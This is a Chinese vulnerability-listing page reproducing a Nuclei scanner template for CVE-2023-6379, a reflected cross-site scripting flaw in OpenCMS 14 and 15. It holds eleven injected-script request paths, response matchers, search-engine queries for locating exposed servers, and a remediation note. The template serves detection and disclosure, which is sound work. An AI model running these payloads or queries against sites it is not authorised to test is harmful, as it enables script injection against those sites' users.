CVE-2023-6379: OpenCMS 14 & 15 - Cross Site Scripting

日期: 2025-08-01 | 影响软件: OpenCMS | POC: 已公开

漏洞描述

Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template.

PoC代码[已公开]

id: CVE-2023-6379

info:
  name: OpenCMS 14 & 15 - Cross Site Scripting
  author: msegoviag
  severity: medium
  description: |
    Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template.
  remediation: |
    Update to version OpenCMS 16
  reference:
    - https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2023-6379
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6379
    - https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-alkacon-software-opencms
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://github.com/msegoviag/msegoviag
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-6379
    cwe-id: CWE-79
    epss-score: 0.18616
    epss-percentile: 0.95033
    cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 11
    vendor: alkacon
    product: opencms
    shodan-query:
      - title:"opencms"
      - http.title:"opencms"
      - cpe:"cpe:2.3:a:alkacon:opencms"
      - /opencms/
    fofa-query: title="opencms"
    google-query: intitle:"opencms"
  tags: cve2023,cve,opencms,xss,alkacon,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"
    payloads:
      paths:
        - '/tagebuch/eintraege/index.html?reloaded&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/list-editor/index.html?reloaded&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/advanced-elements/list/index.html?reloaded&sort=date_asc&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/advanced-elements/list/list-filters/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/lists/compact/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/lists/elaborate/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/lists/text-tiles/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/lists/masonry/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/blog/articles/index.html?reloaded&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/advanced-elements/form/index.html?formsubmit=12&formaction1=submit&InputField-11939054842=mrs&InputField-21939054842=190806&InputField-31939054842=403105&InputField-41939054842=2&InputField-51939054842=&InputField-61939054842=1&captcha_token_id=1"><script>alert(document.domain)<%2fscript>ufs5prh3qfe&captchaphrase1939054842=1'
        - '/content-elements/job-ad/index.html?reloaded&sort=date_desc&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>" />'
          - 'OpenCms'
        condition: and

      - type: word
        part: content_type
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a0046304402206d58eebb2cc6ffa6f9b9d2db428ee43e21e0b14a80a23982606e8dec9ac47699022021b82d804dfb3aaced498b6543b9c688421741822a86f859391c7437602515e7:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-6379.yaml

相关漏洞推荐